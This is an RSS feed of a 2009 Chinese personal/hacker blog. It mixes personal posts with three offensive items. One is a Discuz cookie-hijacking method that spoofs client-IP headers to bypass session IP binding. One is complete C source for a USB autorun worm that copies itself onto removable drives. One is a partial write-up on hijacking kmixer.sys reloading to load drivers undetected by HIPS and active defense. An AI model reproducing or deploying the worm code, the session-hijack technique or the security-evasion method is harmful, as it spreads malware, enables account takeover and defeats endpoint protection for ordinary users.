<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[wi4r&#39;s草窝]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[不求一夜成名，只有人共鸣]]></description>
<link>http://hi.baidu.com/wi4r</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[换地方了_tog]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/edace3a378a144a7cbefd018.html]]></link>
        <description><![CDATA[
		
		<p>baidu hi用着一直还挺不错的。。。</p>
<p>现在换到tog小组去<a href="http://www.tog.ie/">http://www.tog.ie</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/edace3a378a144a7cbefd018.html#comment">查看评论</a>]]></description>
        <pubDate>2009-10-25  21:21</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/edace3a378a144a7cbefd018.html</guid>
</item>

<item>
        <title><![CDATA[石中剑安全会。]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/8993e73e8083e5c87d1e7159.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://www.newcamelotcouncil.com/">http://www.newcamelotcouncil.com</a></p>
<p>帮zulu推广下这次石中剑安全峰会，内容安排的很丰富</p>
<p>到时候去混个脸熟</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/8993e73e8083e5c87d1e7159.html#comment">查看评论</a>]]></description>
        <pubDate>2009-10-06  15:22</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/8993e73e8083e5c87d1e7159.html</guid>
</item>

<item>
        <title><![CDATA[开学了！让人感动和心酸的一幕幕]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/cd5ee589b5b4619da4c272d5.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://v.youku.com/v_show/id_XNDAyMTc4ODQ=.html">http://v.youku.com/v_show/id_XNDAyMTc4ODQ=.html</a>（视频地址）</p>
<p>十年寒窗，高考一战啊，想想自己十年来的奋斗、努力、汗水、艰辛，如今步入大学的大门是多么的不容易啊，想想在备考的时候，自己的爸爸妈妈不畏辛苦，陪伴自己的孩子复习功课，调整心态，父母的这份（爱）是多么的伟大，如今进大学了，父母还是依旧放心不下我们，宁愿丢下自己的手上的工作，都要把我们亲自送进大学的门！ 愿全天下的学子在新的大学里面学业有成！</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <font color="#ff0000">儿行千里，母担忧啊</font></p> <a href="http://hi.baidu.com/wi4r/blog/item/cd5ee589b5b4619da4c272d5.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/cd5ee589b5b4619da4c272d5.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-31  22:15</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/cd5ee589b5b4619da4c272d5.html</guid>
</item>

<item>
        <title><![CDATA[闷沉的夏季]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/661a123ef42fd1e554e72323.html]]></link>
        <description><![CDATA[
		
		<p>好久没上来发牢骚了,这段时间工作都快疯掉了</p>
<p>好不容易上个星期六出去几个朋友吃个饭吧,人家都以为咱们是山卡卡出来的,</p>
<p>走在大街上,看美女都花枝招展的,男的个个大帅哥,俺呢?</p>
<p>近来发现自己越来越远离人际圈了,身边的女孩都说我跟她们有代沟,其实大家都是同龄人.</p>
<p>这几天深受打击阿,广东这地方可能真不适合咱们呆</p>
<p>很想回家,广东这地方在也没值得留念的东西了</p>
<p> </p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/661a123ef42fd1e554e72323.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-11  14:58</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/661a123ef42fd1e554e72323.html</guid>
</item>

<item>
        <title><![CDATA[DISCUZ所有版本COOKIE劫持方法+DEMO]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/9cd5f0fc3ad1ec4cd6887d9c.html]]></link>
        <description><![CDATA[
		
		<div class="ContentFont" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font style="font-size: 14px; ">DISCUZ和很多论坛都无法进行会话劫持，因为会话和IP绑定了，DISCUZ主要的会话认证机制如下：<br>
<br>
/inlude/common.inc.php<br>
//第136行 验证会话重要的一段就是从sessions表中查询SID，其中一个重要的条件就是$onlineip，如果$onlineip和sessions表中的IP信息无法对应，就不能继续建立sessions表中保存的会话。<br>
&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;<br>
<br>
<br>
代码:<br>
if($sid) {<br>
    if($discuz_uid) {<br>
$query = $db-&gt;query(&quot;SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, s.pageviews AS spageviews, s.lastolupdate, s.seccode, $membertablefields<br>
FROM {$tablepre}sessions s, {$tablepre}members m<br>
WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid'<br>
AND m.password='$discuz_pw' AND m.secques='$discuz_secques'&quot;);<br>
<br>
//79行 $onlineip首先取自HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头<br>
------------------------------------------------------------------------------<br>
if(getenv('HTTP_CLIENT_IP') &amp;&amp; strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {<br>
$onlineip = getenv('HTTP_CLIENT_IP');<br>
} elseif(getenv('HTTP_X_FORWARDED_FOR') &amp;&amp; strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {<br>
$onlineip = getenv('HTTP_X_FORWARDED_FOR');<br>
} elseif(getenv('REMOTE_ADDR') &amp;&amp; strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {<br>
$onlineip = getenv('REMOTE_ADDR');<br>
} elseif(isset($_SERVER['REMOTE_ADDR']) &amp;&amp; $_SERVER['REMOTE_ADDR'] &amp;&amp; strcasecmp($_SERVER['REMOTE_ADDR'], &lsquo;unknown&rsquo;)) {<br>
$onlineip = $_SERVER['REMOTE_ADDR'];<br>
}<br>
<br>
所以如果我们伪造HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头就可以绕过IP绑定。</font></div>
<div> </div> <a href="http://hi.baidu.com/wi4r/blog/item/9cd5f0fc3ad1ec4cd6887d9c.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B0%B2%C8%AB%D4%A4%BE%AF">*安全预警</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/9cd5f0fc3ad1ec4cd6887d9c.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-28  11:26</pubDate>
        <category><![CDATA[*安全预警]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/9cd5f0fc3ad1ec4cd6887d9c.html</guid>
</item>

<item>
        <title><![CDATA[恭喜dm]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/cff445c702cb91129d163d2e.html]]></link>
        <description><![CDATA[
		
		<p>今天午饭后听湿人风说DM兄,当爸爸了,结果跑去BLOG一看.</p>
<p>先恭喜DM吖,小DM出世了..</p>
<p> </p>
<p>祝福这小DM往后又一黑客</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/cff445c702cb91129d163d2e.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-17  16:58</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/cff445c702cb91129d163d2e.html</guid>
</item>

<item>
        <title><![CDATA[安全不小心掉进洞里了]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/8d003df5e67efd67ddc474b5.html]]></link>
        <description><![CDATA[
		
		<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size="5"> <font color="#ff0000">   <strong>洞</strong></font></font></p>
<div forimg="1" align="center">
<p><a target="_blank" href="http://hiphotos.baidu.com/wi4r/pic/item/1c0d5e235f2581834623e8d7.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/wi4r/abpic/item/1c0d5e235f2581834623e8d7.jpg"></a></p>
<p><strong><font size="4">←漏洞→</font></strong></p>
<div forimg="1">
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/wi4r/pic/item/083722dea9982b34632798dc.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/wi4r/abpic/item/083722dea9982b34632798dc.jpg"></a></p>
<p><strong>[不知道什么洞]</strong></p>
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/wi4r/pic/item/920a418ad9671835c8fc7adf.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/wi4r/abpic/item/920a418ad9671835c8fc7adf.jpg"></a></p>
<p><strong>好奇心也是洞</strong></p>
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/wi4r/pic/item/037b07a92aa52c96cb130cda.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/wi4r/abpic/item/037b07a92aa52c96cb130cda.jpg"></a></p>
<p>这是个到处都是洞的时代,</p>
<p>这是最好的时代,也是最坏的时代<br>
这是智慧的时代,也是愚蠢的时代<br>
这是置信的时代,也是疑虑的时代<br>
这是光明的季节,也是黑暗的季节<br>
这是希望的春天,也是绝望的冬天<br>
  我们什么都有,也什么都没有<br>
我们都会上天坛,也全部会下地狱</p>
<p>------让统计数值说话-------</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  1997年<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  40个漏洞<br>
 <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2006年<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  21,400个漏洞<br>
&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  1997-2006年<br>
&nbsp;&nbsp;&nbsp;  漏洞成长了535倍</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  1997年<br>
&nbsp;&nbsp;  17,000个病毒\木马</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2006年<br>
&nbsp;&nbsp;  222,000个病毒\木马<br>
 <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  1997-2006<br>
  病毒与木马成长了13倍</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2000年<br>
&nbsp;&nbsp;&nbsp;&nbsp;  43.6%远端漏洞</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2007年<br>
&nbsp;&nbsp;&nbsp;&nbsp;  89.4%远端漏洞<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2007年<br>
&nbsp;&nbsp;  漏洞多与浏览器有关</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2008年<br>
&nbsp;&nbsp;  浏览器漏洞为239个</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2008年<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  58%与web有关<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  2008年<br>
&nbsp;&nbsp;&nbsp;  11,253 个xss漏洞<br>
&nbsp;&nbsp;  xss较上半年成长近2倍<br>
 </p>
<p><font color="#ff0000">后续更新中........</font></p>
</div>
</div>
</div>
</div>
</div> <a href="http://hi.baidu.com/wi4r/blog/item/8d003df5e67efd67ddc474b5.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B0%CB%D8%D4">*八卦</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/8d003df5e67efd67ddc474b5.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-12  20:38</pubDate>
        <category><![CDATA[*八卦]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/8d003df5e67efd67ddc474b5.html</guid>
</item>

<item>
        <title><![CDATA[夏季的选择]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/cff445c76a10f9129c163d41.html]]></link>
        <description><![CDATA[
		
		<p>这个平凡而又炎热的夏天,发生很多事情,得到了很多,也失去了很多,有过甜,有苦过</p>
<p>想想回来都大半年了,感觉自己还没完全的去适应社会,自己总是徘徊在三岔路口</p>
<p>这个炎热,闷热的夏天让我想起了,在训练的夏天,在那段日子里面,摔倒了再爬起来,哭了擦干眼泪,重新来过</p>
<p>一个动作练不好,练两遍,两遍不行,三遍.总是把自己折腾的遍体鳞伤的,</p>
<p>身边的好朋友都各奔自己的前程去了,走的走,散的散,现在留下我一个了</p>
<p>这个星期过后,她就要离开广东,回到曾经她起飞的地方了,她叫我去走的那一天去送她</p>
<p>记住她给我的鼓励,关心,疼爱!</p>
<p>在技术圈子,摸爬滚打这几年,学到很多东西,我感谢我那两位恩师(莫大,冷面)</p>
<p>当然还有:狐狸 ,小猫,周老大,小强,菊花侠,诺诺,coldeye,胖子,RB,仟仟,虎子等等!</p>
<p>希望我的朋友们,每天开开心心的,技术越来越牛,你们永远是我南瓜的朋友</p>
<p>如今,我终于找到了自己喜欢做的事,自己要走的路了.</p>
<p> </p>
<p> </p>
<p> </p> <a href="http://hi.baidu.com/wi4r/blog/item/cff445c76a10f9129c163d41.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B2%E8%C2%A5">*茶楼</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/cff445c76a10f9129c163d41.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-03  20:09</pubDate>
        <category><![CDATA[*茶楼]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/cff445c76a10f9129c163d41.html</guid>
</item>

<item>
        <title><![CDATA[感染USB代码]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/70358a39511e7dcbd5622510.html]]></link>
        <description><![CDATA[
		
		<div class="ContentFont" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font style="font-size: 14px; ">#include &lt;<a class="wordstyle" href="http://www.hack58.net/" target="_blank">windows</a>.h&gt;<br>
#include &lt;stdio.h&gt;<br>
<br>
int InfectDrives( );<br>
int WriteINI( char* sINI, char* sFILE );<br>
int ReadINI( char* sINI, char* sFILE  );<br>
int FileCopy( char* sNEW );<br>
<br>
char* szFileName = &quot;blah.exe&quot;;<br>
<br>
int main()<br>
{<br>
&nbsp;&nbsp;&nbsp;  int i = InfectDrives( );<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  printf( &quot;drives infected: %i&quot;, i );<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  getchar( );<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  return 0;<br>
&nbsp;&nbsp;&nbsp;  <br>
};<br>
<br>
int InfectDrives( )<br>
{<br>
&nbsp;&nbsp;&nbsp;  char szBuffer[260];<br>
&nbsp;&nbsp;&nbsp;  char szInit[520], szFile[520];<br>
&nbsp;&nbsp;&nbsp;  int iCount = 0, iGet, iType;<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer );<br>
&nbsp;&nbsp;&nbsp;  if( iGet == 0 ) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  return( 0 );<br>
&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;  char *szDrive = szBuffer;<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  while( *szDrive )<br>
&nbsp;&nbsp;&nbsp;  {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  iType = GetDriveTypeA( szDrive );<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  sprintf( szInit, &quot;%sautorun.inf&quot;, szDrive ); //craft inf<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  sprintf( szFile, &quot;%s%s&quot;, szDrive, szFileName ); //craft file<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  if( iType == 2 ) //removable device <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  if( ReadINI( szInit, szFileName ) == 0  ) //check for infection<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  if( WriteINI( szInit, szFileName ) == 0 ) //infect<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  if( FileCopy( szFile ) == 0 ) //copy file<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  iCount++;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  szDrive = &amp;szDrive[ strlen( szDrive ) + 1];<br>
&nbsp;&nbsp;&nbsp;  } <br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  return( iCount );<br>
};<br>
<br>
int WriteINI( char* sINI, char* sFILE )<br>
{<br>
&nbsp;&nbsp;&nbsp;  unsigned long bWrite = WritePrivateProfileString( &quot;autorun&quot;, &quot;open&quot;, sFILE, sINI );<br>
&nbsp;&nbsp;&nbsp;  if( bWrite == 0 ) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  return( 1 );<br>
&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;  return( 0 );<br>
};<br>
<br>
int ReadINI( char* sINI, char* sFILE ) <br>
{<br>
&nbsp;&nbsp;&nbsp;  char szBuffer[260];<br>
&nbsp;&nbsp;&nbsp;  unsigned long lRead = GetPrivateProfileString( &quot;autorun&quot;, &quot;open&quot;, NULL, szBuffer, sizeof( szBuffer ), sINI );<br>
&nbsp;&nbsp;&nbsp;  if( lRead != 0 ) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  if( strstr( szBuffer, sFILE ) ) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  return( 1 );<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;  return( 0 );<br>
};<br>
<br>
int FileCopy( char* sNEW )<br>
{<br>
&nbsp;&nbsp;&nbsp;  char szBuffer[260];<br>
&nbsp;&nbsp;&nbsp;  GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) );<br>
&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  bool bCopy = CopyFile( szBuffer, sNEW, 0 );<br>
&nbsp;&nbsp;&nbsp;  if( bCopy == false ) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  return( 1 );<br>
&nbsp;&nbsp;&nbsp;  }<br>
&nbsp;&nbsp;&nbsp;  return( 0 );<br>
}</font></div> <a href="http://hi.baidu.com/wi4r/blog/item/70358a39511e7dcbd5622510.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%D4%AD%B4%B4">*原创</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/70358a39511e7dcbd5622510.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-01  21:22</pubDate>
        <category><![CDATA[*原创]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/70358a39511e7dcbd5622510.html</guid>
</item>

<item>
        <title><![CDATA[Audio Mixer劫持(爆新)]]></title>
        <link><![CDATA[http://hi.baidu.com/wi4r/blog/item/554e8018bfef974c43a9ad35.html]]></link>
        <description><![CDATA[
		
		<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span>作者：</span><span><font face="Times New Roman">Azy</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span>按照</span><span><font face="Times New Roman">m$</font></span><span>的说明，</span><span><font face="Times New Roman">kmixer.sys</font></span><span>是一个音频的混音驱动（</span><span><font face="Times New Roman">Audio Mixer</font></span><span>），借助于这个驱动的某些特性，通过对其劫持可以实现一种较&ldquo;新&rdquo;的驱动加载方式，从而穿越目前市场上一切主动防御和</span><span><font face="Times New Roman">HIPS.</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">Kmixer</font></span><span>的特性是：</span><span><font face="Times New Roman">windows</font></span><span>可能维护了一个计数器，从而在系统的音频设备（小喇叭）空闲时间到达某一门限时将</span><span><font face="Times New Roman">kmixer</font></span><span>驱动卸载，而在音频设备再次发声时通过</span><span><font face="Times New Roman">worker thread</font></span><span>调用</span><span><font face="Times New Roman">PipDeviceActionWorker-&gt;…-&gt;…-&gt;IopLoadDriver</font></span><span>再次加载驱动，由于这中间不经过</span><span><font face="Times New Roman">Zw/NtLoadDriver</font></span><span>，因此可以完全绕过</span><span><font face="Times New Roman">HIPS/</font></span><span>主防的监控（</span><span><font face="Times New Roman">kmixer</font></span><span>重新载入时的</span><span><font face="Times New Roman">call stack </font></span><span>如下）。</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">WARNING: Stack unwind information not available. Following frames may be wrong.</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">00 f9ea6824 805a4f27 kmixer+0x28105</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">01 f9ea68f4 805c7366 nt!IopLoadDriver+0x66c</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">02 f9ea6938 80597b32 nt!PipCallDriverAddDeviceQueryRoutine+0x235</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">03 f9ea6984 8059827c nt!RtlpCallQueryRegistryRoutine+0x3b1</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">04 f9ea69e8 805ac308 nt!RtlQueryRegistryValues+0x2a6</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">05 f9ea6abc 805ac409 nt!PipCallDriverAddDevice+0x261</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">06 f9ea6d18 805a9fbe nt!PipProcessDevNodeTree+0x1a4</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">07 f9ea6d4c 8050a396 nt!PiProcessReenumeration+0x60</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">08 f9ea6d74 804e526b nt!PipDeviceActionWorker+0x166</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">09 f9ea6dac 8057e0f1 nt!ExpWorkerThread+0x100</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">0a f9ea6ddc 804f927a nt!PspSystemThreadStartup+0x34</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span><font face="Times New Roman">0b 00000000 00000000 nt!KiThreadStartup+0x16</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span>因此，配合下面的方法及步骤，通过对</span><span><font face="Times New Roman">AM</font></span><span>进行劫持可以实现驱动的加载：</span></p>
